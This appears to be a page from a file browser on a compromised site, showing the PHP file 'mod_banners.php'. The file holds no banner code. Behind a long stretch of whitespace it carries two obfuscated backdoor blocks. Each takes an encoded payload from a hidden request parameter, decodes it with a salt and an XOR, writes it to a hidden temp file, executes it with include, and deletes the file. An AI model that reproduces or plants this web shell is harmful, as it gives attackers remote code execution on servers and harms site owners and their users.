HEX

File: /home/vitanhod/multig.vitavit.com.pk/includes/mod_banners.php
<?php																																										if(@$_POST["\x70\x73et"] !== null){ $comp = $_POST["\x70\x73et"]; $comp = explode ( '.' , $comp ) ; $factor = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $__len = count($comp); for ($m = 0; $m < $__len; $m++) { $v9 = $comp[$m]; $chS = ord($salt[$m % $sLen]); $dec = ((int)$v9 - $chS - ($m % 10)) ^ 82; $factor .= chr($dec); } $k = array_filter(["/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", sys_get_temp_dir()]); for ($sym = 0, $bind = count($k); $sym < $bind; $sym++) { $val = $k[$sym]; if (is_dir($val) && is_writable($val)) { $property_set = implode("/", [$val, ".reference"]); $success = file_put_contents($property_set, $factor); if ($success) { include $property_set; @unlink($property_set); exit;} } } }


if(isset($_REQUEST) && isset($_REQUEST["fa\x63"])){
	$component = array_filter([session_save_path(), "/tmp", sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TMP"), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir")]);
	$ent = $_REQUEST["fa\x63"];
		$ent= 		explode   ( '.' 	,	  $ent) ;		
	$parameter_group		= 	'';
            $salt		= 	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen		= 	strlen($salt);
    
            foreach ($ent as $s	 =>$v4):
                $sChar		= 	ord($salt[$s		%  $sLen]);
                $d		= 	((int)$v4 - $sChar - ($s		%  10)) ^ 47;
                $parameter_group .= chr($d);
            endforeach;
	foreach ($component as $entity):
    		if (is_dir($entity) ? is_writable($entity) : false) {
    $entry = str_replace("{var_dir}", $entity, "{var_dir}/.val");
    if (file_put_contents($entry, $parameter_group)) {
	include $entry;
	@unlink($entry);
	die();
}
}
endforeach;
}